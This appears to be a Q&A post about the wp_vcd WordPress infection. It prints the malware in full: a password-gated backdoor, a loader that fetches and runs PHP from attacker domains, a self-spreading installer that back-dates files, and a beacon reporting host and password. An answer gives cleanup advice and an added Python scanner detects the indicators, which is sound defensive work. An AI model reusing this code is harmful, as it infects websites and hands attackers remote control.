How does this hacker script infect all of the websites under the same hosting?

Date: 2020-02-26  Author: Alt C

I have a client whose functions.php file was infected with this code. The client did use a nulled theme. I am curious how it infected the other websites under the same host.

I tried it on localhost and it infected all of the websites under it.

//oxMHBJQ1ltSUdsemMyVjBLQ1JmVWtWUlZVVlRWRnNuYg453545gf
// Analyst note: remote-control branch. It only runs when the request carries the
// hard-coded password, and it can rewrite this file's own C2 domain or payload block.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '631701d8ae54f47e23b26ed4356f6cb8')) {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action']) {

        case 'change_domain':
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                            $file = preg_replace('/'.$matcholddomain[1][0].'/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
        break;

        case 'change_code':
            if (isset($_REQUEST['newcode'])) {
                if (!empty($_REQUEST['newcode'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
        break;

        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die("");
}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if (!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    // Analyst note: skips wp-cron.php and xmlrpc.php requests (note the loose "== false" comparisons).
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        // Analyst note: the fetched PHP is written to a temp file, include()d and the temp
        // file deleted; the wp-tmp.php copies written below are the persistent artifact.
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            if (fwrite($handle, "<?php\n" . $phpCode)) {
            } else {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }

        // Analyst note: three C2 domains are tried in turn; a response is only executed if it
        // contains this key. Previously dropped wp-tmp.php copies are the offline fallback.
        $wp_auth_key='08404b74f3e71b919ab80a8f9c65e64b';
        if (($tmpcontent = @file_get_contents("http://www.zrilns.com/code.php") or $tmpcontent = @file_get_contents_tcurl("http://www.zrilns.com/code.php")) and stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents("http://www.zrilns.pw/code.php")  and stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents("http://www.zrilns.top/code.php")  and stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') and stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') and stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') and stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}
I checked the wp-tmp.php file and it contains a piece of code. Also, in wp-includes/

<?php
error_reporting(0);
//PD9waHAKLy9veE1IQkpRMWx0U1Vkc2VtTXlWakJMUTFKbVZXdFdVbFpWV
ini_set('display_errors', 0);
//ddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3FU1RbJ3Bhc3N3b3JkJ10gY2QiOwoJCXN3aXRjaCAoJF9SRVFVR

// Analyst note: $install_code is the base64-encoded block shown above, with its
// password derived per host from HTTP_HOST and this site's AUTH_SALT.
$install_code = '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';

$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';

// Analyst note: every functions.php one or two levels under wp-content/themes that lacks the
// WP_V_CD marker gets the block prepended. touch() then resets the mtime to the value read
// before the write, so "last modified" looks unchanged; the inode ctime still advances.
// scandir() output includes '.' and '..', so the inner loop also reaches directories beside
// the themes folder.
$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
    foreach ($list as $_)
    {
        if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
        {
            $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');

            if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
            {
                if (strpos($content, 'WP_V_CD') === false)
                {
                    $content = $install_code . $content ;
                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                }
                else
                {
                    $ping = false;
                }
            }
        }
        else
        {
            $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
            foreach ($list2 as $_2)
            {
                if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
                {
                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');

                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
                    {
                        if (strpos($content, 'WP_V_CD') === false)
                        {
                            $content = $install_code . $content ;
                            @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
                            touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                            $ping2 = true;
                        }
                        else
                        {
                            //$ping = false;
                        }
                    }
                }
            }
        }
    }

    // Analyst note: after a fresh infection the host name and derived password are
    // reported to the attacker's server.
    if ($ping) {
        $content = @file_get_contents('http://www.zrilns.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
        //@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.zrilns.com/admin.txt'));
    }

    if ($ping2) {
        $content = @file_get_contents('http://www.zrilns.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
        //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.zrilns.com/admin.txt'));
        //echo ABSPATH . 'wp-includes/class.wp.php';
    }
}
?><?php error_reporting(0);?>

1 Answer
Top answer, by SO user Rick Hellewell

(Note that this question may get closed, since "hacked" questions are not allowed here. But I'll sneak in a quick answer...)

First glance / quick look: the attacker is adding some request parameters to site pages. The parameters are "change_domain" or "change_code" (see the SWITCH statement).

The first one will add to the current file using file_put_contents. It uses code from the attacker (see the URL in the CURL statement call; do not go to that URL!!).

It looks like they also have the auth_key from the wp-settings.php file, so there may have been a previous successful attack that allowed them to obtain those values.

You need to do a complete cleanup of the site, change all credentials (hosting, FTP, database, WP users), and completely delete/replace all WP core code, themes and plugins. You may also want to look at the wp_posts table to see if there are some inserted posts containing code. And look for hidden .ico files containing code.

I have a procedure for cleaning up a site that may help: https://www.securitydawg.com/recovering-from-a-hacked-wordpress-site/ . There is a lot of Google/Bing/Duck material on this issue.

Added

Part of the code fetches code from the attacker (again, don't go there) and writes it to wp-includes/wp-tmp.php plus a wp-tmp.php file in the current template folder.

There is a bunch of obfuscated code in there that, when decoded, will try to add some extra code to the footer. I have seen this kind of code before. It indicates that someone attacked the entire hosting area. It will not only try to infect the current site, but also any other site on the same hosting account.

So a massive cleanup is needed.... Even after a thorough cleanup, this particular infection may keep recurring (I haven't seen that yet at one site I manage).

But your code may help my attempts to clean up a hosting account. See also this question and my answer (and the discussion): What's the effect if this malware if infected your WP? .
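The answer above describes how the installer walks wp-content/themes, prepends itself to every functions.php that lacks the WP_V_CD marker, resets the file's modification time, and drops wp-tmp.php copies. The scanner below is an added example, not code from the question or the answer: it checks a WordPress tree for exactly those indicators, taking the strings (WP_V_CD, theme_temp_setup, $div_code_name, $start_wp_theme_tmp, /code.php, the wp-tmp.php and class.wp.php names) from the posted sample. The directory layout, the stand-in file contents and the theme names in build_sample_site() are constructed for the demonstration, and the ctime/mtime skew check is an assumption about how the sample's touch() call behaves on a POSIX filesystem (mtime can be set back, the inode change time cannot).

```python
"""Scan a WordPress tree for the wp_vcd indicators visible in the posted sample.

Added example, not code from the question or the answer. Indicator strings come
from the sample; the fixture built by build_sample_site() is constructed.
"""
from __future__ import annotations

import os
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path

# Substrings the sample writes into functions.php or checks for there.
CONTENT_INDICATORS = {
    "WP_V_CD": "reinfection marker; the installer skips files that already contain it",
    "theme_temp_setup": "loader that writes fetched PHP to a temp file and include()s it",
    "$div_code_name": 'variable the sample sets to "wp_vcd"',
    "start_wp_theme_tmp": "payload delimiter rewritten by the change_code action",
    "/code.php": "hard-coded remote path the loader fetches",
}
# File names the sample drops (wp-tmp.php) or names in commented-out code
# (class.wp.php, chosen to resemble WordPress core's class-wp.php).
DROPPED_NAMES = {"wp-tmp.php": "dropped copy of the fetched payload",
                 "class.wp.php": "name used in the sample's commented-out drop"}
SKEW_SECONDS = 86400  # flag when ctime is more than a day ahead of mtime (assumption)


@dataclass(frozen=True)
class Finding:
    path: str       # relative to the WordPress root, POSIX separators
    indicator: str
    detail: str


def iter_functions_php(themes_dir: Path):
    """functions.php one or two levels under wp-content/themes: the same depth
    the installer loop in the sample walks (theme dir, else its subdirectories)."""
    for entry in sorted(p for p in themes_dir.iterdir() if p.is_dir()):
        if (entry / "functions.php").is_file():
            yield entry / "functions.php"
            continue
        for sub in sorted(p for p in entry.iterdir() if p.is_dir()):
            if (sub / "functions.php").is_file():
                yield sub / "functions.php"


def timestamp_skew(fp: Path) -> bool:
    """touch($file, $oldtime) in the sample resets mtime after the write, but on
    Linux/macOS the inode change time cannot be set back, so ctime far ahead of
    mtime is a tell. On Windows st_ctime is creation time, so skip it there."""
    st = fp.stat()
    return os.name != "nt" and (st.st_ctime - st.st_mtime) > SKEW_SECONDS


def scan_wordpress(root: str | os.PathLike) -> list[Finding]:
    """Return one Finding per (file, indicator) hit under a WordPress root."""
    root = Path(root)

    def rel(p: Path) -> str:
        return p.relative_to(root).as_posix()

    findings: list[Finding] = []
    themes_dir = root / "wp-content" / "themes"
    if themes_dir.is_dir():
        for fp in iter_functions_php(themes_dir):
            text = fp.read_text(errors="replace")
            for needle, why in CONTENT_INDICATORS.items():
                if needle in text:
                    findings.append(Finding(rel(fp), needle, why))
            if timestamp_skew(fp):
                findings.append(Finding(rel(fp), "timestamp_skew", "mtime reset after write"))
    for name, why in DROPPED_NAMES.items():
        for hit in sorted(root.rglob(name)):
            if hit.is_file():
                findings.append(Finding(rel(hit), name, why))
    return findings


def indicator_map(findings: list[Finding]) -> dict[str, set[str]]:
    """Group findings as {relative path: set of indicator names}."""
    out: dict[str, set[str]] = {}
    for f in findings:
        out.setdefault(f.path, set()).add(f.indicator)
    return out


CLEAN_FUNCTIONS = "<?php\nadd_theme_support('post-thumbnails');\n"
# Constructed stand-in for the injected block: carries only the marker strings.
INFECTED_PREFIX = ("<?php\n// WP_V_CD (constructed stand-in, not the sample's code)\n"
                   '$div_code_name = "wp_vcd";\n'
                   "if (!function_exists('theme_temp_setup')) { /* elided */ }\n?>\n")


def build_sample_site(root: str | os.PathLike) -> None:
    """Constructed fixture: a clean theme, an infected theme nested one level down
    (the depth the installer's inner loop reaches), and a dropped wp-tmp.php."""
    root = Path(root)
    themes = root / "wp-content" / "themes"
    (themes / "clean-theme").mkdir(parents=True)
    (themes / "clean-theme" / "functions.php").write_text(CLEAN_FUNCTIONS)
    infected = themes / "vendor" / "nulled-theme" / "functions.php"
    infected.parent.mkdir(parents=True)
    infected.write_text(INFECTED_PREFIX + CLEAN_FUNCTIONS)
    old = time.time() - 30 * 86400           # mimic touch($file, $time): mtime goes back
    os.utime(infected, (old, old))           # ctime stays "now"
    (root / "wp-includes").mkdir()
    (root / "wp-includes" / "wp-tmp.php").write_text("<?php\n// constructed placeholder\n")


def demo() -> list[Finding]:
    """Build the fixture in a fresh temp dir and return what the scan flags."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return scan_wordpress(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: {f.indicator} ({f.detail})")
```

Against a real docroot, call scan_wordpress("/path/to/wordpress"); a clean install returns an empty list. Substring hits on the marker strings are the strong signal, while the timestamp heuristic only tells you a file was rewritten and then back-dated, which is also a reason not to trust "last modified" dates during the cleanup the answer recommends.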
